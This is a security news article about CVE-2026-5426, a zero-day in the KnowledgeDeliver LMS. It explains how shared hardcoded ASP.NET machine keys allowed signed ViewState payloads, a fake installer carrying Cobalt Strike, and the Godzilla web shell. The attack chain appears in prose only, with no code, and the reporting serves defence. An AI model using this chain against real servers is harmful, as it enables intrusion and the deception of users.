KnowledgeDeliver zero-day – A critical KnowledgeDeliver LMS vulnerability has been exploited as a zero-day to deploy the Godzilla web shell, with attackers able to execute code without authentication. The root cause, Mandiant says, traces back to shared hardcoded ASP.NET machine keys acr
By the time investigators traced it back, the damage was already baked into the server.
Hackers exploited a critical zero-day vulnerability in a server running the KnowledgeDeliver learning management system (LMS) to deploy the Godzilla web shell. The flaw, documented as CVE-2026-5426, is a deserialization issue that can be exploited without authentication.
What made this intrusion especially dangerous wasn’t just the vulnerability itself, but the way KnowledgeDeliver customers were configured. The problem stems from the use of a shared hardcoded machine key in the web portal configuration across all KnowledgeDeliver customer deployments—an approach that turned a single secret into a reusable key for attackers.
The attack path ran through ASP.NET ViewState. Threat actors obtained the machine key and used it in ViewState deserialization attacks to sign malicious ViewState payloads, achieving remote code execution at the operating system level.
Mandiant says it responded in late 2025 to an attack on a KnowledgeDeliver server. In that incident, the vulnerability was initially exploited as a zero-day to inject a malicious script into the web platform. Researchers also point to the configuration that enabled the early compromise: the use of “identical pre-shared ASP.NET machine keys across multiple customer deployments. ” a detail they say made the exploitation possible.
Mandiant adds that KnowledgeDeliver installations deployed before Feb. 24, 2026 depended on a standardized web.config file provided by the vendor. That configuration file contained hardcoded machineKey values used by the ASP.NET framework to encrypt and sign data, including ViewState payloads.
From there, the intrusion moved from code execution to persuasion. The malicious code on the platform “convinced users to download a fake installer,” Mandiant reports. Once the users’ machines were pulled in, the machine “got infected with a Cobalt Strike beacon,” effectively planting a backdoor.
Even the payload carried an edge that looked customized. Mandiant says the payload was encrypted using a key that used the name of the compromised organization, indicating the threat actor prepared it for the targeted organization.
After that first foothold, the attackers delivered Godzilla itself. Mandiant says the threat actor deployed the .NET-based in-memory web shell, Godzilla (a.k.a. BlueBeam), which has also been used in similar attacks Microsoft observed in late 2024.
Godzilla isn’t new to the ViewState playbook. In August 2024, cybersecurity company ASEC reported that Godzilla was being deployed in ASP.NET environments in ViewState deserialization attacks targeting companies in the financial sector.
In the KnowledgeDeliver case. Mandiant notes the threat actor compromised KnowledgeDeliver instances and then executed commands to escalate control over the web server’s file system. That escalation included modifying an application JavaScript file with code that prompted users to install a “security authentication plugin. ” along with instructions to load a malicious script from a domain under the attacker’s control.
The broader lesson is that machine keys reused across deployments keep resurfacing as an entry point for attackers. Over the past year, hackers have used improperly secured machine keys in ViewState deserialization attacks targeting web platforms for various products.
The same underlying weakness has already shown up elsewhere. In March last year. threat actors abused a hardcoded machine key to craft a malicious payload that allowed access to Gladinet CentreStack’s secure file-sharing servers. In July 2025, hackers compromised 85 Microsoft SharePoint servers after stealing the machine key to create signed malicious ViewState payloads. State-sponsored actors also used ViewState deserialization attacks to deploy a reconnaissance tool named WeepSteel on Sitecore servers that exposed the ASP.NET machine key.
Taken together. the KnowledgeDeliver incident paints a grim picture of what happens when a secret isn’t treated like a secret. In this case. a shared hardcoded machineKey value across customer deployments helped turn a single vulnerability into a repeatable path for attackers—ending with code execution. user deception. and a Godzilla web shell already in memory.
KnowledgeDeliver CVE-2026-5426 Godzilla web shell BlueBeam ViewState deserialization ASP.NET machine key Cobalt Strike ransomware cybersecurity zero-day